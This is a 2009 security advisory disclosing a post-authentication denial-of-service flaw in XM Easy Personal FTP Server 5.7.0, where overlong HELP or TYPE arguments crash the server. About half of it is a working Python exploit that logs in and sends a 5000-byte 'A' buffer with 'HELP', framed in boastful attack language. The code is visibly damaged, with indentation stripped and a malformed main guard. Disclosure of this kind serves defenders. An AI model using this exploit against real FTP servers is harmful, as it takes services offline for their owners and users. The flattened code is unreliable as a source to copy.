XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service
vulnerability exists in XM Personal FTP Server that causes the application to crash when a long
list of arguments is sent to certain FTP commands post authentication.
Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent
to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a
parameter to these commands, the FTP server cannot process it and it will crash. Note that this
is a post authentication vulnerability, so user must be logged in to exploit the vulnerability.
No registers are overwritten, hence remote code execution may not be possible.
Severity:
High
Solution:
No patches available from vendor
No workaround is available at this time
Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure
#!/usr/bin/python
import os
import sys
import time
from ftplib import FTP
def usage():
print "[…XM Personal FTP Server 5.7.0 DoS Exploit…]"
print "[…neeraj(.)thakar(at)gmail(.)com…]\n"
print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages
done by your crazy thinking… :P\n"
if name == "main":
ftpport = '21'
# get the args..
if len(sys.argv) < 3:
usage()
sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]
print "Connecting to "+ftpserver+" using "+user+"....",
# Try opening a connection to the FTP server
try:
F = FTP(ftpserver)
F.timeout = 3
if F:
print 'Connected !'
except:
print "\nCould not connect to the Server :(\n"
sys.exit(1)
#Lets create the Buffer..
crap = "A" * 5000
# Creat'in da'bomb
dabomb = 'HELP '+crap
print "Press any key to login.."
ch = sys.stdin.read(1)
# Lets login
try:
F.login(user, passwd)
except:
print "Oops.. Looks like you forgot to create a login !!\n"
F.quit()
sys.exit(1)
print "Target Locked, Press any key to fire..",
ch = sys.stdin.read(1)
print 'Sendin Da\'Bomb..'
try:
F.sendcmd(dabomb)
except:
print 'Target destroyed !! Mission successfull..!'
print 'Returning to base..'
F.close()
sys.exit(0)